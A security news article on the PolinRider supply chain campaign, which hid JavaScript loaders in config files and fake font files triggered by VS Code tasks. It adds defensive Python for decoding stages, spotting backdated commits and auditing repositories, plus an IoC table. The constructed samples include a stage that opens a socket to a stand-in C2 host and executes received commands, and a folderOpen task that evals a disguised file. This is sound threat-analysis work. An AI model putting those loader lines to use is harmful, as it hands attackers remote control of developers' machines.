
North Korea-Linked Hackers Hide JavaScript Loaders in Open Source Repositories

Jul 03, 2026 · 5 min read

A new wave of supply chain attacks is spreading across the open source world, and this time the target is developers themselves.

Security researchers have uncovered a campaign called PolinRider that hides malicious JavaScript loaders inside trusted code repositories, waiting for unsuspecting developers to run them.

The campaign has been linked to North Korean threat actors tied to the broader Contagious Interview and Famous Chollima activity clusters.

These groups are known for targeting software engineers with fake job offers and trojanized coding tests, and PolinRider extends that playbook: the lure is now a legitimate-looking package or repository rather than a recruiter's test project.

What makes PolinRider dangerous is its reach. It began on npm but has since spread into Packagist, Go modules, and even a Chrome extension, showing the attackers are not sticking to a single ecosystem.

Researchers from Socket.dev said the campaign has grown far larger than earlier reports suggested.

Socket.dev said in a report shared with Cyber Security News (CSN) that they identified 162 malicious release artifacts spread across 108 unique packages and extensions, including 80 compromised Go modules, 10 Packagist packages, and one Chrome extension.

The scale of this discovery shows how a single group can quietly poison multiple corners of the open source supply chain at once. Because the malicious code hides inside legitimate-looking files, many developers may have installed it without noticing anything wrong.

North Korea-Linked Hackers Hide JavaScript Loaders

The attackers behind PolinRider rely on a mix of old and new tricks to stay hidden. Earlier waves buried obfuscated JavaScript inside build configuration files such as vite.config.js, counting on developers not to read every line of a file they assume is boilerplate.

More recent versions disguise the malicious script as a fake .woff2 font file, a format most developers would never open, let alone inspect: the extension is the only thing font-like about it.

Execution is triggered quietly through a .vscode/tasks.json entry with "runOptions": {"runOn": "folderOpen"}, which VS Code runs automatically when the folder is opened in a trusted workspace, so cloning the project and opening it in the editor is enough to start the loader.

The Xpos587 repository list shows multiple unrelated projects updated in the same period (Source - Socket.dev)

Once active, the loader reaches out to public blockchain RPC services on the TRON, Aptos, and BNB Smart Chain networks.

It reads an encrypted second-stage payload through these endpoints, XOR-decrypts it with a key embedded in the loader, and executes the result with eval. Public chain state is not something a takedown request can delete, so the operators get a payload host that is never theirs to lose.

The payloads observed so far are DEV#POPPER and OmniStealer. Both support remote command execution, talk to the operators' servers over socket.io-client, and steal credentials, browser data, and cryptocurrency wallet information.
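The decrypt step is a repeating-key XOR, so an analyst who has captured the blob and pulled the key out of the loader can recover the second stage offline without executing anything. The following is an added example written for this page, not code from the campaign or from Socket.dev's report; the stage text, the key, and the .invalid host name are constructed placeholders. recover_key shows the known-plaintext shortcut: XOR the start of the blob with a plaintext prefix you expect (a JavaScript preamble) and read the key off the repeating keystream.

```python
import re
from itertools import cycle


def xor_unwrap(blob: bytes, key: bytes) -> bytes:
    """Repeating-key XOR is its own inverse: the loader's decrypt step is exactly this."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(blob, cycle(key)))


def recover_key(blob: bytes, known_prefix: bytes) -> bytes:
    """Known-plaintext recovery: ciphertext XOR expected plaintext gives the keystream, and the
    shortest period at which the keystream repeats is the key (needs more known bytes than key length)."""
    stream = xor_unwrap(blob[:len(known_prefix)], known_prefix)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i - period] for i in range(period, len(stream))):
            return stream[:period]
    return stream


def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Printable ASCII runs: the first thing to read out of a recovered stage."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def triage_stage(blob: bytes, key: bytes) -> dict:
    """Decode and summarise. The stage is treated as data and never handed to an interpreter."""
    stage = xor_unwrap(blob, key)
    return {
        "looks_like_js": any(tok in stage for tok in (b"require(", b"import ", b"function")),
        "uses_socket_io": b"socket.io-client" in stage,
        "spawns_processes": b"child_process" in stage,
        "strings": extract_strings(stage),
    }


# Constructed stand-in for a second stage; the host is a reserved .invalid name, not a real C2
SAMPLE_STAGE = (
    b"const io = require('socket.io-client');\n"
    b"const sock = io('wss://c2.example.invalid');\n"
    b"sock.on('cmd', c => require('child_process').exec(c));\n"
)
SAMPLE_KEY = b"k3y-example"                       # assumed key; a real loader embeds its own
SAMPLE_BLOB = xor_unwrap(SAMPLE_STAGE, SAMPLE_KEY)  # what the loader would fetch over RPC

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB, b"const io = require(")  # 19 known bytes, longer than the key
    print("recovered key:", key)
    print(triage_stage(SAMPLE_BLOB, key))
```

If the key is not obvious in the loader, a guessed preamble (`const `, `(function`, `require(`) is usually enough known plaintext to recover it; write the decoded stage to a file for static analysis rather than reproducing the loader's eval.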

Compromised Accounts and Repository Manipulation

A major piece of this campaign centers on the GitHub account Xpos587. Several repositories under this account were modified within the same narrow window on June 23 at 10:00 UTC, a burst that looks like scripted bulk modification after an account takeover rather than normal maintenance.

Two repositories connected to this account, Xpos587/git2md and Xpos587/markfetch, along with a separate project called Artiffusion-Inc/mirofish, were found carrying the hidden loader.

The markfetch repository used the fake font trick, while mirofish hid its payload inside a file called vite.config.js.

GitHub Activity exposes the force push used to rewrite repository history (Source - Socket.dev)

On Packagist, the campaign expanded through a namespace called sevenspan, tied to the 7span organization, with the 7span/react-list package among those affected.

Maintainers removed the fake font files once they were discovered, but the obfuscated code hidden in configuration files remained untouched, showing that deleting the one artifact you noticed is not cleanup.

The attackers also rewrote Git history, force-pushing and backdating commits so that tampered code appears older than it really is.

The commit history displayed on GitHub therefore cannot be trusted on its own; defenders need to check the repository's activity log, which records force pushes, and the reflogs of any clones that predate the rewrite.
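Git stores two timestamps per commit, an author date and a committer date, and a rewrite that only backdates one of them leaves a visible seam. The following is an added example for this page, not part of the article or of Socket.dev's analysis; SAMPLE_LOG is constructed output in the shape of `git log --format='%H%x09%aI%x09%cI%x09%s'`, and the window is the June 23 10:00 UTC burst the article describes.

```python
from datetime import datetime, timedelta, timezone

LOG_FORMAT = "%H%x09%aI%x09%cI%x09%s"  # hash, author date, committer date, subject, tab-separated


def parse_git_log(text: str) -> list[dict]:
    """Parse one commit per line as produced by git log --format=LOG_FORMAT."""
    rows = []
    for line in text.strip().splitlines():
        commit, author, committer, subject = line.split("\t", 3)
        rows.append({"hash": commit, "subject": subject,
                     "author": datetime.fromisoformat(author),
                     "committer": datetime.fromisoformat(committer)})
    return rows


def classify(rows: list[dict], window_start: datetime, window_end: datetime,
             max_skew: timedelta = timedelta(hours=1)) -> dict[str, str]:
    """Map commit hash -> reason for every commit worth a closer look.

    A fresh commit has equal author and committer dates. A rebase or cherry-pick keeps the
    author date and stamps a new committer date, so positive skew can be legitimate. A
    committer date earlier than the author date cannot occur naturally. And any commit whose
    committer date lands inside the takeover window was written or rewritten then, whatever
    its displayed author date says."""
    flagged = {}
    for r in rows:
        skew = r["committer"] - r["author"]
        if skew < timedelta(0):
            flagged[r["hash"]] = "committer date precedes author date: timestamps forged"
        elif window_start <= r["committer"] <= window_end:
            if skew > max_skew:
                flagged[r["hash"]] = "written during takeover window with backdated author date"
            else:
                flagged[r["hash"]] = "written during takeover window"
        elif skew > max_skew:
            flagged[r["hash"]] = "author/committer skew; check whether a rebase explains it"
    return flagged


# Constructed sample log: one honest commit, three touched in the June 23 10:00 UTC window
SAMPLE_LOG = """\
a1a1a1a\t2026-05-10T08:15:00+00:00\t2026-05-10T08:15:00+00:00\tAdd README badge
b2b2b2b\t2025-11-02T14:00:00+00:00\t2026-06-23T10:00:07+00:00\tUpdate vite config
c3c3c3c\t2026-06-23T10:00:09+00:00\t2026-06-23T10:00:09+00:00\tfix fonts
d4d4d4d\t2026-06-30T12:00:00+00:00\t2026-06-23T10:00:11+00:00\tchore: deps
"""
WINDOW = (datetime(2026, 6, 23, 10, 0, tzinfo=timezone.utc),
          datetime(2026, 6, 23, 10, 5, tzinfo=timezone.utc))

if __name__ == "__main__":
    for commit, why in classify(parse_git_log(SAMPLE_LOG), *WINDOW).items():
        print(commit, why)
```

An actor who sets both GIT_AUTHOR_DATE and GIT_COMMITTER_DATE defeats this check, so treat it as triage. The authoritative signals are the activity log on GitHub and, in a clone that existed before the rewrite, `git fetch` followed by `git merge-base --is-ancestor origin/main@{1} origin/main`, which exits non-zero when the remote branch no longer descends from what you last fetched.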

Security teams should treat any environment running an affected package as compromised until proven otherwise.

Socket.dev recommended preserving forensic evidence, rebuilding from known-good lockfiles, and rotating exposed secrets from a clean machine rather than the infected one.

Additional guidance includes auditing machines for VS Code tasks configured with "runOn": "folderOpen", and reviewing repositories for suspicious changes to files such as .vscode/tasks.json, config.js, and vite.config.js.
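The two hiding tricks and the auto-run trigger described above, together with the audit recommended here, can be checked with a short script. The following is an added example written for this page, not Socket.dev's tooling or anything from the campaign; the sample tasks.json, the throwaway checkout built in demo_findings, and the static heuristics in loader_indicators are constructed for illustration, and a real loader may match none of them. It parses .vscode/tasks.json as the JSONC that VS Code accepts, flags any task whose runOptions.runOn is folderOpen, checks that files with a .woff2 extension actually start with the WOFF2 signature, and runs cheap heuristics over files named *config.js.

```python
import json
import re
import tempfile
from pathlib import Path

WOFF2_MAGIC = b"wOF2"  # every genuine WOFF2 font begins with this 4-byte signature


def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals (VS Code reads tasks.json as JSONC)."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:                      # inside a string: copy verbatim, honouring \" escapes
            out.append(c)
            if c == "\\" and i + 1 < n:
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):  # line comment: skip to the end of the line
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1
        elif text.startswith("/*", i):  # block comment: skip past the closing */
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def auto_run_tasks(tasks_json_text: str) -> list[dict]:
    """Tasks VS Code starts on folder open, i.e. "runOptions": {"runOn": "folderOpen"}."""
    cleaned = re.sub(r",(\s*[}\]])", r"\1", strip_jsonc(tasks_json_text))  # tolerate trailing commas
    hits = []
    for task in json.loads(cleaned).get("tasks", []):
        if str(task.get("runOptions", {}).get("runOn", "")).lower() == "folderopen":
            hits.append({k: task.get(k) for k in ("label", "type", "command", "args")})
    return hits


def is_real_woff2(data: bytes) -> bool:
    """A file named .woff2 whose first bytes are not the wOF2 magic is not a font."""
    return data[:4] == WOFF2_MAGIC


def loader_indicators(js_text: str) -> list[str]:
    """Cheap static signs of an obfuscated JS loader in a config file; triage, not proof."""
    checks = [
        (r"\beval\s*\(|\bnew\s+Function\s*\(", "dynamic code execution (eval / new Function)"),
        (r"['\"][A-Za-z0-9+/=]{200,}['\"]|(?:\\x[0-9a-fA-F]{2}){32,}", "long encoded string literal"),
        (r"charCodeAt\([^)]*\)\s*\^", "byte-wise XOR decoding"),
    ]
    return [reason for pattern, reason in checks if re.search(pattern, js_text)]


def audit_repo(root: Path) -> list[tuple[str, str]]:
    """Walk a checkout (skipping node_modules and .git) and return (relative path, finding) pairs."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or "node_modules" in p.parts or ".git" in p.parts:
            continue
        rel = p.relative_to(root).as_posix()
        if p.name == "tasks.json" and p.parent.name == ".vscode":
            for t in auto_run_tasks(p.read_text(encoding="utf-8", errors="replace")):
                findings.append((rel, f"auto-run task {t['label']!r}: {t['command']} {t['args']}"))
        elif p.suffix == ".woff2" and not is_real_woff2(p.read_bytes()):
            findings.append((rel, "named .woff2 but lacks the wOF2 font signature"))
        elif p.name.endswith("config.js"):
            for reason in loader_indicators(p.read_text(encoding="utf-8", errors="replace")):
                findings.append((rel, reason))
    return findings


# Constructed sample tasks.json (not a campaign artifact): one benign task, one folderOpen task
SAMPLE_TASKS_JSON = """{
  // comments and trailing commas are legal here
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    { "label": "fonts", "type": "shell", "command": "node",
      "args": ["-e", "eval(require('fs').readFileSync('brand.woff2','utf8'))"],
      "runOptions": { "runOn": "folderOpen" } }
  ]
}
"""


def demo_findings() -> list[tuple[str, str]]:
    """Build a throwaway checkout containing all three tricks (constructed) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".vscode").mkdir()
        (root / ".vscode" / "tasks.json").write_text(SAMPLE_TASKS_JSON)
        (root / "brand.woff2").write_bytes(b"(function(){/* script wearing a font extension */})()")
        (root / "vite.config.js").write_text("export default {};\neval(require('fs').readFileSync('brand.woff2','utf8'));\n")
        return audit_repo(root)


if __name__ == "__main__":
    for path, finding in demo_findings():
        print(f"{path}: {finding}")
```

Run audit_repo against every checkout on a suspected machine, not just the repositories named in the report, and remember that a folderOpen task is only the trigger: a clean tasks.json next to a stale vite.config.js is exactly the partial cleanup the article warns about.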

Indicators of Compromise (IoCs):

Type | Indicator | Description
GitHub account | Xpos587 | Threat actor-controlled account linked to bulk repository modification on June 23, 10:00 UTC
GitHub repository | Xpos587/git2md | Repository compromised as part of the PolinRider campaign
GitHub repository | Xpos587/markfetch | Repository hiding a fake .woff2 font file payload
GitHub repository | Artiffusion-Inc/mirofish | Repository hiding malicious code inside vite.config.js
Packagist namespace | sevenspan | Compromised namespace maintained by the 7span organization
GitHub organization | 7span | Organization linked to compromised Packagist packages
GitHub repository | 7span/react-list | Repository associated with malicious release activity
File name | vite.config.js | Configuration file used to conceal the obfuscated JavaScript loader
File type | .woff2 (fake font file) | Disguised payload format used to hide loader code
VS Code config | .vscode/tasks.json | Task file abused with "runOn": "folderOpen" to trigger loader execution
Malware payload | DEV#POPPER | Second-stage payload delivering command execution and credential theft
Malware payload | OmniStealer | Second-stage payload targeting browser data and cryptocurrency wallets
Infrastructure | TRON, Aptos, BNB Smart Chain RPC services | Public blockchain RPC endpoints abused to retrieve encrypted payload material

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com
